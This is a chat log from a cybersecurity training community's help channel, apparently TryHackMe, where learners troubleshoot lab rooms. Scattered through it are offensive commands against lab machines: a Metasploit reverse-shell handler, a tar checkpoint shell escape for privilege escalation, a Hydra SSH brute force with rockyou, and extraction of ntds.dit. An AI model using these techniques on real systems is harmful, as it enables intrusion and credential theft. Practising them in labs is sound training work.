msf5 exploit(multi/handler) > set LHOST 10.10.13.236
LHOST => 10.10.13.236
msf5 exploit(multi/handler) > set LPORT 7000
LPORT => 7000
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.13.236:7000
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.13.236:7000`

stuck fractal
#

I'm only seeing about half of what you're doing

#

I'm also heading out now, sorry

white salmon
#

Hi guys

#

on my system and want to transfer it to the target system

#

i started a simple http server on my system in the directory where linpeas.sh is

#

how can i get the file from my target system

#

this only downloaded the index.html

white salmon
#

Hi guys

#

doing this room now

#

and im on the last question, where i need to use priviliges escalation

#

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

#

i get this

#

anyone familiar how to solce the last question?

tulip wraith
#

Windows Fundamental 2 may I have a hint for the Task 7 first question. It said system configuration but the theorie is about cmd ???

tulip wraith
#

nevermind I found the problem xD

stuck shuttle
#

hello

raw moss
#

i cannot login with ssh

#

i need help

#

ok so itryed to login with ssh so i did ssh user@10.10.185.128

subtle crystal
raw moss
#

yes

subtle crystal
#

can you show me the way you try to connect ?

raw moss
subtle crystal
raw moss
#

yes i know i did that

subtle crystal
# raw moss

make a little ip a s to make sure you are connected to the vpn

raw moss
#

can i call you pix so you can understand better

#

ok hold on

#

how do i fix connection confused

subtle crystal
#

try this 🙂

raw moss
#

ive done that

dim fractal
#

Dumb question, but is there another way and what is it to open text files in Windows besides "FILENAME.txt", because for some reason it doesn't allow me to open it and instead just repeats it back to the command prompt

Nevermind, found another method

raw moss
#

then whats the solution

cedar anvil
raw moss
#

what is ssh rsa

cedar anvil
gilded quiver
#

@lucid junco basic penetration testing

lucid junco
#

Can you link the room please?

gilded quiver
lucid junco
#

Okay, which task/command are you doing?

gilded quiver
#

smbclient

#

to find the username and password

lucid junco
#

Of the user Jan?

gilded quiver
#

lol what why did you give me the user 😦

#

i want to find out how to get the username and password using smb

lucid junco
#

Oops, sorry!

#

Do you have Enum4Linux?

plush karma
#

Hi, I'm not sure if I'm at the right place. I'm in the Breaching AD room and got an error when running the command in task 3.

gilded quiver
#

not much info on that

lucid junco
white salmon
#

Hello every body i'm stuck in linprivesc in task5 i'm trying to download an exploit into a machine using SimpleHTTPServer and wget can u help me please ?

green minnowBOT
#

Gave +1 Rep to @lucid junco

lucid junco
gilded quiver
lucid junco
gilded quiver
lucid junco
#

Your Target machine ip, not THM.

gilded quiver
#

you mean my kali machine or my thm machine

lucid junco
#

The one that would appear there.

gilded quiver
#

10.10.69.151

plush karma
#

How to post an image with my message? I don't see a button or a feature to do so.

lucid junco
#

Strange, I got nothing from your IP

lucid junco
#

!docs verify

proud scarabBOT
gilded quiver
lucid junco
#

2 secs

#

The one on the right is yours, the one on the left is mine.

gilded quiver
#

well its still running

#

and expires in 20 minutes

lucid junco
#

Try adding an hour and refreshing the machine page

#

Or try mine.

#

10.10.83.181

gilded quiver
#

now its 10.10.57.222

gilded quiver
lucid junco
gilded quiver
#

oh nice lol let me connect now

lucid junco
#

You'll get the users from that.

plush karma
#

Hi Scrubz, I'm verified 😆

lucid junco
plush karma
#

Thanks, Scrubz. Have an awesome day! 🙂

lucid junco
#

You are welcome, happy hacking!

gilded quiver
#

@lucid junco im getting another problem

#

when im doing hydra

#

hydra symbol lookup error

lucid junco
#

What's your syntax?

gilded quiver
#

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.57.222

lucid junco
#

That looks right.

gilded quiver
#

then why the error?

#

this is the error

lucid junco
#

Are you using the attackbox or your VM?

gilded quiver
#

my VM

#

kali

lucid junco
#

sudo apt install libmongoc-dev -y

#

In a new command window

gilded quiver
#

ok working now

#

thanks dude

steel pine
#

just did a exploit with the outcome

  • SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{69736162-3263-0000-0000-000000000000}) (authentication domain:BASIC2)
    [*] 10.10.155.203:445 - Host could not be identified: Windows 6.1 (Samba 4.3.11-Ubuntu)

Now im not sure what version it is is it SMB 1,2,3 or SMB 3.1.1.

echo token
#

Hey Everyone, I’m having sone trouble in Network Services - Enumerating SMB

lucid junco
#

Do more

echo token
#

It says to have a look around once I’m in SMB. I must be missing the right command, I’m having trouble viewing anything.

lucid junco
#

more filename

lucid junco
echo token
green minnowBOT
#

Gave +1 Rep to @lucid junco

steel pine
#

is there a way to do a hydra bruto force faster? becouse this is taking ages..

lucid junco
#

If it's done correctly a password crack shouldn't take longer than 5 minutes? * For THM anyway

steel pine
#

well idk

#

ye im doing it in kali

lucid junco
#

Your choice of VM won't make a difference.

steel pine
#

hydra -l jan -p /usr/share/wordlists/rockyou.txt 10.10.155.203 -t 4 ssh

#

the command i used

lucid junco
#

Try adding -f to the command.

#

IIRC Hydra will keep going even after the password has been found.

steel pine
#

infront of what

lucid junco
#

I usually stick it at the end.

steel pine
#

hydra -l Jan -P /usr/share/wordlists/rockyou.txt 10.10.155.203 -t 4 ssh -f

steel pine
cold eagle
light tundra
#

Working on Task 5 XPath Queries in Windows Event Logs room. I'm taking a big ol' shot at the dark with this guess for the first answer:

|| Get-WinEvent -LogName Security -FilterXpath '*/System/Provider/[@Name="WLMS" and TimeCreated[@SystemTime=2020-12-15T01:09:08.940277500Z] '||

#

can someone tell me how wrong I am? I have no idea what I'm doing here lol

thorny bluff
#

Someone wanna give me a hint for privesc on road

heady gyro
#

that's what I thought it was when reading your message. good luck.

white salmon
#

Hi All,
I have got a question regarding the Network Services room.
I'm doing Exploiting Telnet task, but I am stuck on tcdump listener. I'm not able to install it on the attacking machine. Can someone advise?
Still getting "Unable to locate tcdump package"

left thunder
white salmon
#

attackbox

left thunder
white salmon
#

I did typo

#

no comment...

echo token
#

For the Practical Injection do you just put http://10.10…./evil shell.php into a browser address bar? I can’t get the page to load

#

I get this

modest wasp
echo token
#

Sorry, it’s in OWASP Top 10 Room.

#

No. I’m not. Sorry for the dumb question

#

Sadly I spend a lot of time on with there, my hacker level feels higher than my knowledge. I’ve just avoided connecting to the VPN

#

I got into this bc I got hacked so I’ve been jumping around a lot trying to learn the attack vector or method being used against me. Still can’t get ahead of the hackers which sucks but this stuff interests me.

#

I have a private computer, I just go to library during day bc I’m still pretty sure my home network isn’t secure. Sorry for the life story

#

I originally thought that, but I’ve been through 4 computers, changed ISPs, hired people. I’ve run out of answers but to learn the stuff

#

I had started the attack box before I asked for help. That’s why I didn’t think I needed to be connected to the VPN. I thought I was starting the attack box and connecting to that. Do I need to put the http://10.10…. in a shell on the attack box?

echo token
#

I’m

vernal roost
#

Hi, still on razorblack...
when i use the diskshadow it should map a new drive, correcte ?
then i can use copy-filesbackuppriviledge to get the ntds.dit file, correcte ?

As use h: from diskshadow but i cannot "cd h:", normal ?

jolly inlet
alpine kestrel
jolly inlet
#

attackbox looking now

alpine kestrel
#

eh meeps it don't recall where it is on the attackbox so lets bring out find command to find it find / -name rar2john

left thunder
#

I think it's /opt/john

jolly inlet
#

thanks for the help sorted now

lone sandal
#

@modest wasp and i will be glad to check it out if you have not finished it

vernal roost
#

Hi,
need your help with diskshadow.exe

When i use : expose %someAlias% h:

It should create a drive h: and i should be able to acess it, right ?

vernal roost
#

OMG, 2 days to figure out shadowdisk script needs a space at the end of each line !!! 😦

restive crescent
#

I’m on the Metasploit Exploitation room on task 5 exploitation and I can’t seem to create a session. The exploit I use is windows/smb/ms17_010_eternalblue. Could anyone help me with this?

proud scarabBOT
restive crescent
#

Ohh ok thank you

#

How would I know what payload to use

#

I got it to work. Thank you so much! The LHOST was the issue. It fixed it when I changed it to tun 0. I didn’t have to change the payload

vernal roost
#

i try to download a file from evil-winrm without success

Evil-WinRM PS C:\tmp> download system

it says successful download but i cannot find the file on my local machine. I also ried with a full pass as destination

i feel dumb, but any help would be appreciate

cedar anvil
vernal roost
cedar anvil
#

oh it's the raz0rblack room, nice
yeh, jus download C:\tmp\system should do

vernal roost
#

ohhh, looks like full path as source with C: and not c: is working (i hava the progress bar)

#

but it renamed the file on my local computer !

cedar anvil
#

yeh, the filename is going to be the full path one

vernal roost
#

yep will try to specify name for ntds

#

razorblack is a really good room. My only remark would be the password reuse usage

cedar anvil
#

Yeh but that's really realistic

modest wasp
green minnowBOT
#

Gave +1 Rep to @lone sandal

warm falcon
#

Hi, I'm stuck on task 3 of the NMAP room for the question: "
How would you activate all of the scripts in the "vuln" category?" the answer is --script vuln but it doesn't work

#

an area ?

restive crescent
#

Hey guys I’m struggling significantly on task 6 on Metasploit: exploitation. Does anyone have any tips?

rocky wyvern
restive crescent
#

I can’t run the multi handler. I have the file on the other machine but I can’t figure out how to actually connect it to my host machine

warm falcon
#

what is missing? I don't think so because there are two variants of switches with space and equal

cold eagle
warm falcon
#

liek that script vuln= ?

#

I can't I have to wait until tomorrow

#

for me it's --script vuln

#

it's good

#

-script=vuln

#

but what is the difference with -script and --script ?

restive crescent
#

So what do I do

cold eagle
restive crescent
#

How do I do that

cold eagle
restive crescent
#

Check if the firewall allowed connection to the port

cold eagle
cold eagle
restive crescent
#

I allowed it connection and it didn’t fix it

glossy widget
#

hi, i am wondering about something on the "kubernetes for everyone room".... i have supplied the THM website with the correct password for the question

#

i am trying to input the username i believe is associated with that password but it keeps saying it is incorrect... wondering if anyone has done this room? am i crazy in thinking the username begins with a "g" or nah?

glossy widget
glossy widget
white salmon
glossy widget
green minnowBOT
#

Gave +1 Rep to @white salmon

glossy widget
#

i will slam some more coffee here and try again after lunch

white salmon
glossy widget
#

ok, blame the user then

#

😄

white salmon
glossy widget
white salmon
#

I guess u can enumerate further more.

glossy widget
#

yes, that's the plan

#

🙂

white salmon
#

And I hope you will get the correct username. @glossy widget

glossy widget
#

cheers

white salmon
warm falcon
#

ok so -script is the proper ?

#

it's --script ? but why on tryhackme
this not working?

warm falcon
#

yet on tryhackme it's --script=vlun that didn't work

#

yes it's good

modern ibex
#

Hi all, in the Network Services lesson, I am down in the Exploiting SMB section. I have gained access to the SMB share drive as an anonymous user. It asks "Who can we assume this profile folder belongs to?"

#

I don't know how to find this information. I've been reading online and cant figure out how to open these files like .profile or .cache. cat isn't working

echo token
#

Hi I’m in Network Exploitation Basics - Exploiting SMB. I’m getting asked for a password or I’m doing it wrong

#

The last question

echo token
#

Look*

echo token
vernal roost
magic patrol
#

Basic malware re challenges solutions help

lucid junco
#

Can you link the room?

modern ibex
#

gonna dig a little more and see if I can figure it out

echo token
modern ibex
#

i figured out how to open it, but not sure if I did it in a much more complicated way than necessary

#

I couldn't get cat to work in smbclient, so I downloaded the file to my own machine and used cat there

echo token
modern ibex
#

lcd

echo token
#

Thanks

#

Use “more” instead of “cat”
more [filename]

modern ibex
#

okay thanks

#

are these all files I should be able to open? or just the .txt one

echo token
#

I only opened “working…
You can cd into .ssh though

modern ibex
#

i didnt realize those were directories

#

lol thanks

echo token
#

Thank you

green minnowBOT
#

Gave +1 Rep to @burnt rivet

modern ibex
#

Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".

Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

What is the smb.txt flag?

#

Task 4 of Network Services.... am I supposed to use haschat or john to figure out the password?

#

I found the username from id_rsa.public

#

i assumed the "key" had something to do with the password hash from id_rsa

#

okay. guess I'm going down the wrong rabbit hole

echo token
#

Wrong photo

modern ibex
#

by John I was referring to the password cracking tool. But based on Lassi's comment, it osunds like I dont need to use it

#

John the Ripper password cracking tool

#

It wasnt something I found in id_rsa

#

Im not really sure what Im supposed to be getting from the id_rsa file

echo token
modern ibex
#

right - but we found ||cactus|| from the id_rsa.public file

#

maybe im getting too caught up on id_rsa

#

the pasword - which I assume is in id_rsa

#

perhaps I wrongly interpeted "key" in the directions to mean "password"

echo token
#

I think we need to use the smbclient command again. Maybe with username cactus

#

This statement is confusing me. I’ve read the hashes a couple times. I think smbclient is the service and the key is id_rsa.
Do I need to be looking in the file or just using the file

modern ibex
#

Ya Im pretty lost. I think I used cactus to successfully log in without even putting in a password

#

but, Im back on the same screen

echo token
#

Yeah I did the same.

modern ibex
#

I assumed it was part of authenticating the user

echo token
#

SSH

modern ibex
#

alright I figured it out

#

thanks for all the help. That was tough

echo token
#

Thank you, I’m on the right path

green minnowBOT
#

Gave +1 Rep to @burnt rivet

modern ibex
echo token
modern ibex
#

how are you trying to log into ssh?

echo token
#

I’ve actually completed task 6 so I can help

modern ibex
#

oh okay. maybe you can helpe me with six and I can help you finish that one

#

youre on task 4?

echo token
#

Yeah

#

I don’t know how to ssh with a private key.

modern ibex
#

that is how I got in, I just had the -i id_rsa before the username and ip

echo token
modern ibex
#

This question: Based on the title returned to us, what do we think this port could be used for?

#

in my nmap scan, Im getting the port number and what service is running and that's it

#

Not sure what "title" they are referring to

echo token
#

Look for skidy

lucid junco
#

Take a screnshot.

I have an idea what it is

#

But I can't see it

echo token
modern ibex
lucid junco
#

do -A

echo token
# modern ibex

I’m starting the machine now. I think I did a enum4linux scan

modern ibex
#

im trying a new scan to see if anything new pops up

#

going slow

echo token
# modern ibex

It says in the question before “it is important to try every angle when enumerating. “
I’m not getting anything with my enum4linux scan but I remember using it a couple times when completing these

#

Thanks. What are they referring to “make sure you try every angle when enumerating”

green minnowBOT
#

Gave +1 Rep to @burnt rivet

echo token
#

This is what most of my scans are doing

#

So telnet into it?

#

That’s how I got the answer but I’m wondering if I skipped steps

modern ibex
#

Ive just been doing nmap scans

#

so far Ive discovered: ||port 8012 is open on tcp|| ...not getting much else

deep brook
#

You can try rustscan it’s a bit faster

left thunder
#

Oh, nvm, it seems you already found the port, didn't read your spoiler

echo token
left thunder
# echo token This is what most of my scans are doing

This machine might be a bit finicky.
So give it enough time before going to scan it, like 10 mins.
Also I would suggest to go for a basic scan, so like a -sS for example, as the initial scan on all ports, rather then doing an advanced one.
Regarding speed, you could try adding -T4 --min-rate 10000 to speed it up

#

Beside that you already found the port, didn't read your spoiler

echo token
#

I guess I did it wrong. Good to know about the additional 10 minutes to give the machine after boot up.

modern ibex
green minnowBOT
#

Gave +1 Rep to @echo token

echo token
modern ibex
#

ya this is the first room where I feel like Im left to figure stuff out before learning it first

echo token
modern ibex
#

Which task 4 question are you stuck on

echo token
echo token
green minnowBOT
#

Gave +1 Rep to @modern ibex

echo token
#

Am I referring to the wrong file location for the wordlist?
Network Services - Task 10

left thunder
echo token
#

Yeah but it doesn’t look right

#

What does “l” mean? -before “rwxr”
drwxr = directory with permissions
What about l?

left thunder
#

Beside that, if you are using the provided attacking machine from THM, I highly suggest using the attackbox rather then the kali machine, since the latter is not getting updated/maintained anymore.
So by using the attackbox, you wouldn't have the issue with rockyou.txt in the first place

echo token
#

Sudo gzip?

left thunder
echo token
green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
echo token
left thunder
echo token
#

Think I got it. But somehow went from gs to gz?

#

Nope didn’t get it

left thunder
#

-d seems fine to me?
It's still not the right file name you are trying to unpack

#

But he is using gzip, not gunzip, so I guess that's making a difference

echo token
green minnowBOT
#

Gave +1 Rep to @left thunder

echo token
#

I tried meet but now can’t find the ftp.txt

#

Guessing it’s something else

#

I used the -d and it worked but I won’t next time. What’s it do?

echo token
orchid creek
#

Anyone complete sea surfer room

cedar anvil
cedar anvil
orchid creek
#

Oh user !

#

I'm really stuck at starting

#

There's only 2 ports

#

22 , 80

#

80 has apache index page

cedar anvil
echo token
#

This attackbox nmap scan just went for 15+ minutes and nothing

cedar anvil
solemn kite
#

Hey guys, stuck on Ra1.1. I've reset the user's password but getting auth failed when trying to use it. Any ideas where I'm going wrong?

cedar anvil
solemn kite
#

It is the initial stage and I am trying to enum smb

#

I would post a screenshot but I'm not able to for some reason

tulip mural
#

!docs verify

proud scarabBOT
solemn kite
#

Ahaa got it. Thanks

#

sweet

solemn kite
#

Arggh thats frustrating! I ran the reset again and its now working

#

3rd time lucky

remote heath
#

Hello everyone!!! I'm stuck on Sea Surfer room..anyone can help please??? thx

deep brook
#

Lol

pale spruce
#

Hi
I'm doing Frank and Herby 2 and I'm root on the web server but I can't find any user flag there.
I tried to find all the .txt and flag. files

#

hmm I'm root in a container, okay :p

warm falcon
#

hi i need help with the NMAP room regarding the task with NULL, FIN, Xmas parsing, i can't seem to find why they are commonly used. Is that because they are stealthy ?

alpine kestrel
alpine kestrel
warm falcon
alpine kestrel
#

sorry copy pasted the wrong thingy there

warm falcon
#

as you said i think it starts with the firewall

old chasm
#

What url are you supposed to use for ACME IT Support?

#

Try viewing the page source of the home page of the ACME IT Support Website

#

I don't see it

#

You would think that it would be here somewhere

#

Got it

#

thanks

#

Way back at the beginning

warm falcon
#

so someone has already done the Nmap room?

echo token
#

I’m in Network Services 2 - Enumerating MYSQL
The command it says to use says “Malformed entry 11 in list….

warm falcon
echo token
#

Sorry !docs verify

warm falcon
echo token
#

!docs verify

proud scarabBOT
echo token
left thunder
warm falcon
green minnowBOT
#

Gave +1 Rep to @echo token

warm falcon
#

I can't find yet the answer is in the room but there are too many characters

hearty flame
#

Anyone done with Windows priv Escalataion under Jr pentesting?

violet void
warm falcon
#

thanks

green minnowBOT
#

Gave +1 Rep to @dusk totem

warm falcon
#

You found it where ?

violet void
#

I'm pretty sure that would be ban for both of us...

stuck fractal
#

-undelete -a

covert vortex
left thunder
covert vortex
green minnowBOT
#

Gave +1 Rep to @left thunder

alpine kestrel
left thunder
modern ibex
#

anyone else frequently have issues with nmap stalling out at 99.99% scan completion and just not finishing?

lucid junco
#

Which room are you doing?

modern ibex
#

it finished

#

I just re-ran the scan with -T5 and waited

#

Network Services 2

glass pine
#

Im currently going through the windows privesc room in the jr pentest path and i am stuck on task 4. Double checked the ip in the reverse shell, the command needed in schtasks.bat, etc... When i go to run the task "vulntask" it states "success: attempted to run the scheduled task "vulntask" ive even tried running the netcat shell from my current user and it works but not through the task. Anything i can do to move forward?

modern ibex
#

struggling with Task 4 in Network Services 2

#

not sure what exactly it is asking me to do with bash

#

Not sure what it is referencing as the bash executable

modern ibex
#

im reading through slowly and will work through it again

modern ibex
#

so, in my attack box, I download the bash file from github

#

and that is the bash file I am changing permissions on once I move it to the NFS share

#

im gonna try changing the permissions before putting in the nfs

#

okay - I was wondering if in the nfs itself I wouldnt have the authoirty to change permissions

#

It looks like I change permissions twice

#

once using sudo chown root bash

#

and then again using sudo chmod +[permission] bash

#

Im wondering if the first one I do before uploading into nfs

#

gonna try

#

i guess the first one doesnt matter because Im already root

#

ya I cant figure out why Im not getting the right permissions

#

I copy the bash into the nfs and then use sudo chmod +||s|| bash

#

when you say from the box, do you mean the original downloaded bash file?

#

I was checking the permissions from the mount

#

Ill try looking from ssh'ing in